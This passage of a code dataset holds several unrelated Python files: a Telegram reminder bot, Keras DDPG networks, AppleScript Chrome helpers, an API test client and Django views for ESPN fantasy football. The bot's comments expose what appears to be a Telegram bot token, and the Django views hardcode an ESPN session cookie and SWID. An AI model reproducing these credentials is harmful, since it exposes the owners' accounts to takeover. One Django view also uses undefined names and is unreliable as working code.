24, "usage_type": "attribute"}]} +{"seq_id": "340049444", "text": "import logging\nimport time\nimport datetime\nimport flask\nimport telebot\nfrom parser import url\nfrom config import token\nimport schedule\nimport threading\n\n\nAPI_TOKEN = token\nWEBHOOK_URL_BASE = url #https://6dc3bd5fa35c.ngrok.io\nWEBHOOK_URL_PATH = \"/%s/\" % (API_TOKEN) #/1131808189:AAE5Qp5cSQ3EW7q4h-sj6sOZyGbLd6LT5G4/\n\nlogger = telebot.logger\ntelebot.logger.setLevel(logging.INFO)\nbot = telebot.TeleBot(API_TOKEN)\napp = flask.Flask(__name__)\n#### Расписание для скриптов #########\ndef job():\n print(\"Время 8.00\")\n time_now = datetime.date.today()\n time_now = time_now.strftime('%Y-%m-%d') # Строка вида '2020-12-01'\n #time_now='2020-03-21'\n print(time_now)\n #funktion принимает 2 аргумента query и id=False, возвращает список словарей\n m = db_question.funktion(query=time_now) # m - это словарь типа {'user_id': 'День рождения у Грищенов Сергей, 21.09.1985, 35 лет', ....}\n print('это ответ от бд{}'.format(m))\n for elem in m:\n print('elem', elem)\n for key, value in elem.items(): # key = chat_id , value = '1999-12-12 день рождения у Иванов Иван Иваныч - 34 года\n print('key', key)\n print('value', value)\n bot.send_message(key, value)\n\ndef send_messages():\n bot.send_message('561518886', 'Привет, ')\n\nschedule.every(1).minutes.do(job)\n#schedule.every().day.at('08:00').do(job)\n#schedule.every(1).minutes.do(send_messages)\ndef go():\n while 1:\n schedule.run_pending()\n time.sleep(1)\nt = threading.Thread(target=go, name=\"тест\")\nt.start()\n### Конец блока расписание для скриптов ###\n\n\n@app.route('/html', methods=['GET', 'POST'])\ndef html():\n return 'это моя страница'\n\n\n@app.route('/', methods=['GET', 'HEAD'])\ndef index():\n return ''\n\n# Process webhook calls\n@app.route(WEBHOOK_URL_PATH, methods=['POST']) #WEBHOOK_URL_PATH='/1131808189:AAE5Qp5cSQ3EW7q4h-sj6sOZyGbLd6LT5G4/'\ndef webhook():\n if flask.request.headers.get('content-type') == 'application/json':\n json_string = flask.request.get_data().decode('utf-8')\n update = telebot.types.Update.de_json(json_string)\n bot.process_new_updates([update])\n return ''\n else:\n flask.abort(403)\n\n\n@bot.message_handler(content_types=['text'])\ndef send_text(message):\n chat_id=message.chat.id\n query=message.text.lower()\n query_list=query.split(',')\n query_list=list(map(lambda x:x.strip(), query_list)) # Убираем пробелы в элементах списка вначале и конце строк\n query_list.append(chat_id)\n print(query_list)\n if len(query_list)==5 and query_list[0]=='добавить' and query_list[1].count('-')==2: # Если добавить, и есть дата вида YYYY-MM-DD\n query_list.pop(0) # Убираем 'Добавить' из списка\n if check_date(query_list[0])==False: # Проверяем дату на валидность\n db_question.funktion(query, chat_id)\n bot.send_message(message.chat.id, 'Событие добавлено')\n else: bot.send_message(message.chat.id, check_date(query_list[0])) # Если дата хреновая, пишем в сообщение, что нам не понравилось\n\n elif len(query_list)>=2 and query_list[0]=='показать': # query_list включает два элемента ['показать', 'день рождения/фамилия']\n #bot.send_message(message.chat.id, 'начинаем извлечение из бд') # строка с запросом после 'показать'\n #print('Это query list{}', query_list) #['показать', 'день рождения', 561518886]\n m=db_question.funktion(query, chat_id) # m = [{chat_id:['День рождения у ...',\n print('это ответ от бд{}'.format(m))\n for elem in m:\n for key, answ in elem.items():\n for elem_2 in answ:\n bot.send_message(message.chat.id, elem_2)\n\n elif message.text.lower() == 'привет':\n bot.send_message(message.chat.id, 'Привет, мой создатель')\n elif message.text.lower() == 'пока':\n bot.send_message(message.chat.id, 'Прощай, создатель')\n elif message.text.lower() == 'я тебя люблю':\n bot.send_sticker(message.chat.id, 'CAADAgADZgkAAnlc4gmfCor5YbYYRAI')\n else:\n bot.send_message(message.chat.id, 'Для добавления события делай такой запрос через запятую: Добавить, 2001-01-01, Иванов Иван Иваныч, Годовщина свадьбы')\n\n\ndef check_date(valid_date): #'1985.03.21'\n valid_list_date=valid_date.split('-') #['1985', '03', '21']\n print(valid_list_date)\n if len(valid_list_date)!=3:\n return 'Формат даты:ГГГГ-ММ-ДД'\n elif len(valid_list_date[0])!=4:\n return 'Год должен состоять из 4 цифр и быть вначале даты!'\n elif int(valid_list_date[1]) > 12 or len(str(valid_list_date[1]))!=2:\n return 'Месяц должен состоять из 2 цифр и быть вторым в дате!'\n elif int(valid_list_date[2]) > 31 or len(str(valid_list_date[2]))!=2:\n return 'День должен состоять из двух цифр и быть последним в дате'\n else: return False\n\n\n\n# Remove webhook, it fails sometimes the set if there is a previous webhook\nbot.remove_webhook()\ntime.sleep(1)\n# Set webhook\nbot.set_webhook(url=WEBHOOK_URL_BASE + WEBHOOK_URL_PATH) #https://6dc3bd5fa35c.ngrok.io/1131808189:AAE5Qp5cSQ3EW7q4h-sj6sOZyGbLd6LT5G4/\n\n# Start flask server\napp.run(debug=True)", "sub_path": "testing.py", "file_name": "testing.py", "file_ext": "py", "file_size_in_byte": 6717, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "config.token", "line_number": 12, "usage_type": "name"}, {"api_name": "parser.url", "line_number": 13, "usage_type": "name"}, {"api_name": "telebot.logger", "line_number": 16, "usage_type": "attribute"}, {"api_name": "telebot.logger.setLevel", "line_number": 17, "usage_type": "call"}, {"api_name": "telebot.logger", "line_number": 17, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 17, "usage_type": "attribute"}, {"api_name": "telebot.TeleBot", "line_number": 18, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 23, "usage_type": "attribute"}, {"api_name": "schedule.every", "line_number": 40, "usage_type": "call"}, {"api_name": "schedule.run_pending", "line_number": 45, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 46, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 47, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 64, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 64, "usage_type": "attribute"}, {"api_name": "flask.request.get_data", "line_number": 65, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 65, "usage_type": "attribute"}, {"api_name": "telebot.types.Update.de_json", "line_number": 66, "usage_type": "call"}, {"api_name": "telebot.types", "line_number": 66, "usage_type": "attribute"}, {"api_name": "flask.abort", "line_number": 70, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 125, "usage_type": "call"}]} +{"seq_id": "21021483", "text": "import numpy as np\nimport math\n\nfrom keras.initializers import normal, identity\nfrom keras.models import Sequential, Model, model_from_json, load_model\nfrom keras.layers import Dense, Flatten, Input, merge, Lambda,concatenate, Activation,add\nfrom keras.optimizers import Adam\nimport keras.backend as k\n\nimport tensorflow as tf\n\nn_H1 = 300\nn_H2 = 600\n\nclass CriticNetwork(object):\n def __init__(self, sess, state_size, action_size, tau, lr):\n k.set_session(sess)\n self.sess = sess\n\n self.tau = tau\n self.lr = lr\n\n self.action_size = action_size\n self.model, self.action, self.state = self.create_critic_network(state_size, action_size) \n self.target_model, self.target_action, self.target_state = self.create_critic_network(state_size, action_size) \n self.graph = tf.get_default_graph()\n self.action_grads = tf.gradients(self.model.output, self.action)\n self.sess.run(tf.global_variables_initializer())\n #self.sess.run(tf.initialize_all_variables())\n\n def gradients(self, states, actions):\n return self.sess.run(self.action_grads, feed_dict={self.state: states, self.action: actions })[0]\n\n def target_train(self):\n critic_weights = self.model.get_weights()\n critic_target_weights = self.target_model.get_weights()\n for i in range(len(critic_weights)):\n critic_target_weights[i] = self.tau * critic_weights[i] + (1 - self.tau)* critic_target_weights[i]\n self.target_model.set_weights(critic_target_weights)\n\n def create_critic_network(self, state_size,action_dim):\n S = Input(shape=[state_size]) \n A = Input(shape=[action_dim],name='action2') \n\n w1 = Dense(n_H1, activation='relu')(S)\n a1 = Dense(n_H2, activation='linear')(A) \n h1 = Dense(n_H2, activation='linear')(w1)\n h2 = add([h1,a1]) \n h3 = Dense(n_H2, activation='relu')(h2)\n\n V = Dense(action_dim,activation='linear')(h3) \n model = Model(inputs=[S,A],outputs=V)\n\n adam = Adam(lr=self.lr)\n model.compile(loss='mse', optimizer=adam)\n return model, A, S \n\nclass ActorNetwork(object):\n def __init__(self, sess, state_size, action_size, tau, lr):\n self.sess = sess\n self.tau = tau\n self.lr = lr\n\n k.set_session(sess)\n\n self.model , self.weights, self.state = self.create_actor_network(state_size, action_size) \n self.target_model, self.target_weights, self.target_state = self.create_actor_network(state_size, action_size) \n self.graph = tf.get_default_graph() \n self.action_gradient = tf.placeholder(tf.float32,[None, action_size])\n self.params_grad = tf.gradients(self.model.output, self.weights, -self.action_gradient)\n\n grads = zip(self.params_grad, self.weights)\n self.optimize = tf.train.AdamOptimizer(lr).apply_gradients(grads)\n self.sess.run(tf.global_variables_initializer())#tf.initialize_all_variables())\n\n def train(self, states, action_grads):\n self.sess.run(self.optimize, feed_dict={self.state: states, self.action_gradient: action_grads})\n\n def target_train(self):\n actor_weights = self.model.get_weights()\n actor_target_weights = self.target_model.get_weights()\n for i in range(len(actor_weights)):\n actor_target_weights[i] = self.tau * actor_weights[i] + (1 - self.tau)* actor_target_weights[i]\n self.target_model.set_weights(actor_target_weights)\n\n def create_actor_network(self, state_size, action_dim):\n initializer = normal(mean=0,stddev=1e-4)\n\n S = Input(shape=[state_size],name='input_1') \n h0 = Dense(n_H1, activation='relu',name='dense_1')(S)\n h1 = Dense(n_H2, activation='relu',name='dense_2')(h0)\n\n Steering = Dense(1,activation='tanh',use_bias=True,kernel_initializer=initializer,name='dense_3')(h1)\n Acceleration = Dense(1,activation='sigmoid',use_bias=True, kernel_initializer=initializer,name='dense_4')(h1)\n Brake = Dense(1,activation='sigmoid',use_bias=True,kernel_initializer=initializer,name='dense_5')(h1)\n\n V = concatenate([Steering,Acceleration,Brake],axis=-1,name='merge_1') \n model = Model(input=S,output=V)\n \n return model, model.trainable_weights, S", "sub_path": "code/networks_ddpg.py", "file_name": "networks_ddpg.py", "file_ext": "py", "file_size_in_byte": 4309, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "keras.backend.set_session", "line_number": 17, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 17, "usage_type": "name"}, {"api_name": "tensorflow.get_default_graph", "line_number": 26, "usage_type": "call"}, {"api_name": "tensorflow.gradients", "line_number": 27, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 28, "usage_type": "call"}, {"api_name": "keras.layers.Input", "line_number": 42, "usage_type": "call"}, {"api_name": "keras.layers.Input", "line_number": 43, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 45, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 46, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 47, "usage_type": "call"}, {"api_name": "keras.layers.add", "line_number": 48, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 49, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 51, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 52, "usage_type": "call"}, {"api_name": "keras.optimizers.Adam", "line_number": 54, "usage_type": "call"}, {"api_name": "keras.backend.set_session", "line_number": 64, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 64, "usage_type": "name"}, {"api_name": "tensorflow.get_default_graph", "line_number": 68, "usage_type": "call"}, {"api_name": "tensorflow.placeholder", "line_number": 69, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 69, "usage_type": "attribute"}, {"api_name": "tensorflow.gradients", "line_number": 70, "usage_type": "call"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 73, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 73, "usage_type": "attribute"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 74, "usage_type": "call"}, {"api_name": "keras.initializers.normal", "line_number": 87, "usage_type": "call"}, {"api_name": "keras.layers.Input", "line_number": 89, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 90, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 91, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 93, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 94, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 95, "usage_type": "call"}, {"api_name": "keras.layers.concatenate", "line_number": 97, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 98, "usage_type": "call"}]} +{"seq_id": "121570356", "text": "# !/usr/bin/python\n# coding: utf-8\nimport logging\nimport timeit\nfrom subprocess import Popen, PIPE\n\n\ndef log_func(func):\n def wrapper(*args, **kwargs):\n t0 = timeit.default_timer()\n result = func(*args, **kwargs)\n elapsed = timeit.default_timer() - t0\n arg_str = ', '.join(repr(arg) for arg in args)\n\n logging.info('[%0.8fs] %s (%s)==%s' % (elapsed, func.__name__,arg_str, result))\n return result\n\n return wrapper\n\n\ndef applescript_call(src):\n\n p = Popen(['osascript', '-'], stdin=PIPE, stdout=PIPE, stderr=PIPE, universal_newlines=True)\n stdout, stderr = p.communicate(src)\n if len(stderr) > 0:\n logging.error(\"apple script src:\\n%s\\n\" % src)\n logging.error(\"apple script error:\\n%s\\n\" % stderr)\n raise Exception(stderr)\n print(stdout)\n # logging.debug(\"result:\\n%s\\n\" % stdout)\n return stdout.rstrip(\"\\n\")\n\n\n@log_func\ndef get_window_id_list():\n text = applescript_call(r\"\"\"\n \ttell application \"Google Chrome\"\n \t\tset window_number to 0\n \t\tset list_text to \"\"\n \t\trepeat with window_obj in windows\n \t\t\tset list_text to list_text & (id of window_obj as text) & \" \"\n \t\tend repeat\n \t\treturn list_text\n \tend tell\n \"\"\")\n text = text.strip()\n if text == \"\":\n return []\n return list(map(int, text.split(\" \")))\n\n\n@log_func\ndef bring_window_to_front_by_id(_id):\n applescript_call(r\"\"\"\n\ttell application \"Google Chrome\"\n\tset window_number to 0\n\trepeat with window_obj in windows\n\t\tset window_number to window_number + 1\n\t\tif %d is id of window_obj then\n\t\t\t# https://stackoverflow.com/questions/10366003/applescript-google-chrome-activate-a-certain-window/16727145#16727145\n\t\t\t# changing the index raises the window, but for example keyboard shortcuts are still registered by the previously frontmost window.\n\t\t\twindow_number\n\t\t\tset index of window window_number to 1\n\t\t\tactivate\n\t\t\texit repeat\n\t\tend if\n\t\t\n\tend repeat\n\t\nend tell\n \"\"\" % _id)\n # applescript_call(r\"\"\"\n # tell application \"Google Chrome\"\n # set window_number to 0\n # repeat with window_obj in windows\n # set window_number to window_number + 1\n # if %d is id of window_obj then\n # tell application \"System Events\" to tell process \"Google Chrome\"\n # perform action \"AXRaise\" of window window_number\n # set frontmost to true\n # end tell\n # exit repeat\n # end if\n #\n # end repeat\n #\n # end tell\n # \"\"\" % _id)\n\n\n@log_func\ndef get_windows():\n csv_text = applescript_call(r\"\"\"\n on GetChromeWindowListCSV()\n \ttell application \"Google Chrome\"\n \t\tset window_number to 0\n \t\tset csv_text to \"id,number,title\n\"\n\n \t\trepeat with window_obj in windows\n \t\t\tset window_number to window_number + 1\n \t\t\tset csv_text to csv_text & (id of window_obj as text) & \",\" & window_number & \",\\\"\" & title of window_obj & \"\\\"\n\"\n \t\tend repeat\n\n \t\treturn csv_text\n \tend tell\n end GetChromeWindowListCSV\n GetChromeWindowListCSV()\n \"\"\")\n # print(csv_text)\n import csv, io\n csv_f = io.StringIO(csv_text)\n reader = csv.DictReader(csv_f)\n result = []\n for row in reader:\n result.append({\n \"title\": row[\"title\"].strip(),\n \"id\": int(row[\"id\"].strip()),\n \"number\": int(row[\"number\"].strip()),\n })\n csv_f.close()\n return result\n", "sub_path": "resources/base_assistance.app/Contents/MacOS/apple_script.py", "file_name": "apple_script.py", "file_ext": "py", "file_size_in_byte": 3546, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "timeit.default_timer", "line_number": 10, "usage_type": "call"}, {"api_name": "timeit.default_timer", "line_number": 12, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 15, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 23, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 23, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 26, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 27, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 113, "usage_type": "call"}, {"api_name": "csv.DictReader", "line_number": 114, "usage_type": "call"}]} +{"seq_id": "233354515", "text": "# coding = utf-8\r\nimport requests\r\nimport json\r\nfrom common.common import common as co\r\nfrom api.api_base.api_base import api_base as api_base\r\n\r\nclass work_comment():\r\n def __init__(self):\r\n # 以下这些接口地址:http://wiki.17zuoye.net/pages/viewpage.action?pageId=38923827\r\n pass\r\n\r\n # 获取古诗课的点评课列表(这个接口有可能因为雪瑞关掉而不正常)\r\n def query_courseList(self,mobile,student_id,lesson_id):\r\n '''\r\n :param mobile:\r\n :param student_id:\r\n :param lesson_id: 指的是课程id,如古诗1-1是1、古诗三是2010,古诗2-2是11\r\n :return:\r\n '''\r\n # https://www.test.17zuoye.net/parentmobile/studytogether/workcomment/courselist.vpage?lesson_id=2010&sid=333927829\r\n url = \"https://www.\" + co().domain_environment + co().domain_latterHalf\r\n url = url + \"parentmobile/studytogether/workcomment/courselist.vpage\"\r\n params = {\"lesson_id\": lesson_id, \"sid\": student_id}\r\n headers = api_base().get_yqx_login_cookie(mobile)\r\n result = requests.get(url=url, params=params, headers=headers).text\r\n return result\r\n\r\n # 展示点评课课程内容\r\n def poemContent_vpage(self,mobile,student_id,course_id):\r\n '''\r\n :param mobile:\r\n :param student_id:\r\n :param course_id: 指的是java端课程内部每一节课中带点评功能的课的id,形式是:5b487b5946e5e271752ea1f2\r\n :return:\r\n '''\r\n url = \"https://www.\" + co().domain_environment + co().domain_latterHalf\r\n url = url + \"parentmobile/studytogether/workcomment/poemcontent.vpage\"\r\n params = {\"course_id\":course_id,\"sid\":student_id}\r\n headers = api_base().get_yqx_login_cookie(mobile)\r\n\r\n result = requests.get(url=url,params=params,headers=headers).text\r\n return result\r\n\r\n # 保存诗词录音\r\n def upload_voice(self,mobile,student_id,voice_url,course_id):\r\n '''\r\n :param mobile:\r\n :param student_id:\r\n :param voice_url:\r\n :param course_id: 指的是java端课程内部每一节课中带点评功能的课的id,形式是:5b487b5946e5e271752ea1f2\r\n :return:\r\n '''\r\n url = \"https://www.\" + co().domain_environment + co().domain_latterHalf\r\n url = url + \"parentmobile/studytogether/workcomment/uploadvoice.vpage\"\r\n data = {\"sid\":student_id,\"url\":voice_url,\"course_id\":course_id}\r\n headers = api_base().get_yqx_login_cookie(mobile)\r\n result = requests.post(url=url,data=data,headers=headers).text\r\n return result\r\n\r\n # 分享诗词录音\r\n def share_voice(self,mobile,student_id,course_id):\r\n '''\r\n :param mobile:\r\n :param student_id:\r\n :param course_id: 指的是java端课程内部每一节课中带点评功能的课的id,形式是:5b487b5946e5e271752ea1f2\r\n :return:\r\n '''\r\n url = \"https://www.\" + co().domain_environment + co().domain_latterHalf\r\n url = url + \"parentmobile/studytogether/workcomment/share.vpage\"\r\n params = {\"student_id\":student_id,\"course_id\":course_id}\r\n headers = api_base().get_yqx_login_cookie(mobile)\r\n result = requests.get(url=url,params=params,headers=headers).text\r\n return result\r\n\r\n # 购买免费课程\r\n def freeCourse_buy(self,mobile,student_id,course_id):\r\n '''\r\n 本函数介绍:免费课程,刚进来默认poemcontent接口的is_buy=false,等点击“限时免费获取中”后,is_buy=true\r\n :param mobile:\r\n :param student_id:\r\n :param course_id:\r\n :return:\r\n '''\r\n url = \"https://www.\" + co().domain_environment + co().domain_latterHalf\r\n url = url + \"parentmobile/studytogether/workcomment/buy.vpage\"\r\n data = {\"sid\": student_id, \"course_id\": course_id}\r\n headers = api_base().get_yqx_login_cookie(mobile)\r\n result = requests.post(url=url, data=data, headers=headers).text\r\n return result\r\n\r\n # 获取学生反馈内容\r\n def load_feedback(self,mobile,student_id,course_id):\r\n '''\r\n :param mobile:\r\n :param student_id:\r\n :param course_id: 指的是java端课程内部每一节课中带点评功能的课的id,形式是:5b487b5946e5e271752ea1f2\r\n :return:\r\n '''\r\n url = \"https://www.\" + co().domain_environment + co().domain_latterHalf\r\n url = url + \"parentmobile/studytogether/workcomment/loadfeedback.vpage\"\r\n params = {\"sid\":student_id,\"course_id\":course_id}\r\n headers = api_base().get_yqx_login_cookie(mobile)\r\n result = requests.get(url=url,params=params,headers=headers).text\r\n return result\r\n\r\n # 保存学生反馈内容\r\n def add_feedback(self,mobile,student_id,course_id,satisfaction,desc):\r\n '''\r\n 本函数介绍:\r\n :param mobile:\r\n :param student_id:\r\n :param course_id:\r\n :param satisfaction: int,满意度,必填。0不满意 1满意\r\n :param desc: 反馈描述,可以为空\r\n :return:\r\n '''\r\n\r\n url = \"https://www.\" + co().domain_environment + co().domain_latterHalf\r\n url = url + \"parentmobile/studytogether/workcomment/addfeedback.vpage\"\r\n data = {\"sid\": student_id,\r\n \"course_id\": course_id,\r\n \"satisfaction\":satisfaction,\r\n \"desc\":desc}\r\n headers = api_base().get_yqx_login_cookie(mobile)\r\n result = requests.post(url=url, data=data, headers=headers).text\r\n return result\r\n\r\n # 学习币购买课程\r\n def coin_buy(self,mobile,student_id,course_id):\r\n '''\r\n 本函数介绍:\r\n :param mobile:\r\n :param student_id:\r\n :param course_id:\r\n :return:\r\n '''\r\n\r\n url = \"https://www.\" + co().domain_environment + co().domain_latterHalf\r\n url = url + \"parentmobile/studytogether/workcomment/coinbuy.vpage\"\r\n data = {\"sid\": student_id, \"course_id\": course_id}\r\n headers = api_base().get_yqx_login_cookie(mobile)\r\n result = requests.post(url=url, data=data, headers=headers).text\r\n return result\r\n\r\n # 分享添加学习币\r\n def add_coin(self,mobile,student_id,course_id):\r\n '''\r\n 本函数介绍:\r\n :param mobile:\r\n :param student_id:\r\n :param course_id:\r\n :return:\r\n '''\r\n\r\n url = \"https://www.\" + co().domain_environment + co().domain_latterHalf\r\n url = url + \"parentmobile/studytogether/workcomment/addcoin.vpage\"\r\n data = {\"sid\": student_id, \"course_id\": course_id}\r\n headers = api_base().get_yqx_login_cookie(mobile)\r\n result = requests.post(url=url, data=data, headers=headers).text\r\n return result\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n workComment = work_comment()\r\n # print(workComment.poemContent_vpage(\"12002001135\",\"333927829\",\"5b5ebd15777487595a0d6bc1\"))\r\n # print(workComment.query_courseList(\"12002001135\",\"333927829\",\"2010\"))\r\n # print(workComment.query_courseList(\"15564301632\", \"333928021\", \"2010\"))\r\n # voice_url = \"https://cdn-va.17zuoye.cn/learntogether/share/poetry/LYESQRWHLZS02.mp3\"\r\n voice_url = \"workcomment/test/2018/07/23/20180723114259664343.MP3\"\r\n # print(workComment.upload_voice(\"12002001002\",\"333924192\",voice_url,\"5b57f2f5ac7459a0849b033f\"))\r\n # print(workComment.share_voice(\"12002001135\",\"333927829\",\"5b5c33c47774873a7f7b4162\")) # 333928021\r\n print(workComment.load_feedback(\"12002001135\",\"333927829\",\"5b6170da8edbc8a50b3029b0\"))\r\n # print(workComment.add_feedback(\"12002001127\",\"333924596\",\"5b57f2f5ac7459a0849b033f\",0,\"我觉得你们一起学可以点评得更好!\"))\r\n # print(workComment.coin_buy(\"12002001127\",\"333924596\",\"5b5ebca7777487595a0d6b95\"))\r\n # print(workComment.add_coin(\"12002001135\",\"333927829\",\"5b5c1792ac74598d9bd58ca2\"))", "sub_path": "api/parent/work_comment/api_work_comment.py", "file_name": "api_work_comment.py", "file_ext": "py", "file_size_in_byte": 7925, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "common.common.common", "line_number": 21, "usage_type": "call"}, {"api_name": "api.api_base.api_base.api_base", "line_number": 24, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 25, "usage_type": "call"}, {"api_name": "common.common.common", "line_number": 36, "usage_type": "call"}, {"api_name": "api.api_base.api_base.api_base", "line_number": 39, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 41, "usage_type": "call"}, {"api_name": "common.common.common", "line_number": 53, "usage_type": "call"}, {"api_name": "api.api_base.api_base.api_base", "line_number": 56, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 57, "usage_type": "call"}, {"api_name": "common.common.common", "line_number": 68, "usage_type": "call"}, {"api_name": "api.api_base.api_base.api_base", "line_number": 71, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 72, "usage_type": "call"}, {"api_name": "common.common.common", "line_number": 84, "usage_type": "call"}, {"api_name": "api.api_base.api_base.api_base", "line_number": 87, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 88, "usage_type": "call"}, {"api_name": "common.common.common", "line_number": 99, "usage_type": "call"}, {"api_name": "api.api_base.api_base.api_base", "line_number": 102, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 103, "usage_type": "call"}, {"api_name": "common.common.common", "line_number": 118, "usage_type": "call"}, {"api_name": "api.api_base.api_base.api_base", "line_number": 124, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 125, "usage_type": "call"}, {"api_name": "common.common.common", "line_number": 138, "usage_type": "call"}, {"api_name": "api.api_base.api_base.api_base", "line_number": 141, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 142, "usage_type": "call"}, {"api_name": "common.common.common", "line_number": 155, "usage_type": "call"}, {"api_name": "api.api_base.api_base.api_base", "line_number": 158, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 159, "usage_type": "call"}]} +{"seq_id": "268492495", "text": "from django.shortcuts import render, get_object_or_404, redirect\nfrom django.utils import timezone\nfrom .models import Post\nfrom .forms import PostForm\nfrom .ff_espn_api import League\n\n# Create your views here.\ndef homepage(request):\n\t# could have something like leagues = league(league_id)... here?\n\treturn render(request,'ff/homepage.html')\n\ndef post_list(request):\n\tposts = Post.objects.filter(published_date__lte=timezone.now()).order_by('published_date')\n\treturn render(request, 'ff/post_list.html', {'posts':posts})\n\t\ndef post_detail(request,pk):\n\tpost = get_object_or_404(Post, pk=pk)\n\treturn render(request, 'ff/post_detail.html',{'post':post})\n\t\ndef post_new(request):\n\tif request.method == \"POST\":\n\t\tform = PostForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tpost = form.save(commit=False)\n\t\t\tpost.author = request.user\n\t\t\tpost.published_date = timezone.now()\n\t\t\tpost.save()\n\t\t\treturn redirect('post_detail',pk=post.pk)\n\telse:\n\t\tform = PostForm()\n\treturn render(request, 'ff/post_edit.html', {'form':form})\n\t\ndef post_edit(request, pk):\n\tpost = get_object_or_404(Post,pk=pk)\n\tif request.method == \"POST\":\n\t\tform = PostForm(request.POST, instance=post)\n\t\tif form.is_valid():\n\t\t\tpost = form.save(commit=False)\n\t\t\tpost.author = request.user\n\t\t\tpost.published_date = timezone.now()\n\t\t\tpost.save()\n\t\t\treturn redirect('post_detail',pk=post.pk)\n\telse:\n\t\tform = PostForm(instance=post)\n\treturn render(request, 'ff/post_edit.html', {'form':form})\n\t\ndef weekly_scores(request):\n\t# Get all this info via a form in future. can use username and password apparently instead of espn_s2 and swid\n\tleague_id = 692156\n\tyear = 2019\n\tespn_s2 = 'AEBlxO7SfF6cuPjEvujvAbpQ5fmvr7oYPxIyQV9qsazYKOuNCN14sb%2FBGr4yOyXwUtLTS8a4igLp2SrraMI6lC1EoWiHHKPhUZyqMiS%2B7JCKSapXyDbqHnX8ur1Ga0q3d7sGe9i4gi8ZKbIqaZWhJBdEqqa2UXBDLrgoxpUade%2BzepUwahpfqOvzOr87TiXACwdcnRIqPmhXGW4SuPU8kMlLqWPgj3zL%2FGLKF%2B%2B2gZ1AQxgHUBXYIXpHatVRgWndZNPLIfehi8FV5Xmi8PZnWP2%2F'\n\tswid = \"{E9BFC86F-E2A7-4FD8-BFC8-6FE2A71FD8B5}\"\n\tleague = League(league_id, year, espn_s2, swid)\n\tteams = league.teams\n\ttop_scorer = league.top_scorer\n\tmatchups = league.scoreboard\n\treturn render(request, 'ff/weekly_scores.html',{'league':league})\n\ndef plot_test(request):\n\tfigure_or_data = [Scatter(x=[1, 2, 3], y=[3, 1, 6])]\n\n\tplot_html = plot_html, plotdivid, width, height = _plot_html(\n\t\tfigure_or_data, True, 'test', True,\n\t\t'100%', '100%')\n\n\tresize_script = ''\n\tif width == '100%' or height == '100%':\n\t\tresize_script = (\n\t\t\t''\n\t\t\t''\n\t\t).format(id=plotdivid)\n\n\thtml = ''.join([\n\t\tplot_html,\n\t\tresize_script])\n\n\treturn render(request, 'dashboard.html', {'html': html,})", "sub_path": "ff/views_0.py", "file_name": "views_0.py", "file_ext": "py", "file_size_in_byte": 2807, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.shortcuts.render", "line_number": 10, "usage_type": "call"}, {"api_name": "models.Post.objects.filter", "line_number": 13, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 13, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 13, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 13, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 13, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 14, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 17, "usage_type": "call"}, {"api_name": "models.Post", "line_number": 17, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 18, "usage_type": "call"}, {"api_name": "forms.PostForm", "line_number": 22, "usage_type": "call"}, {"api_name": 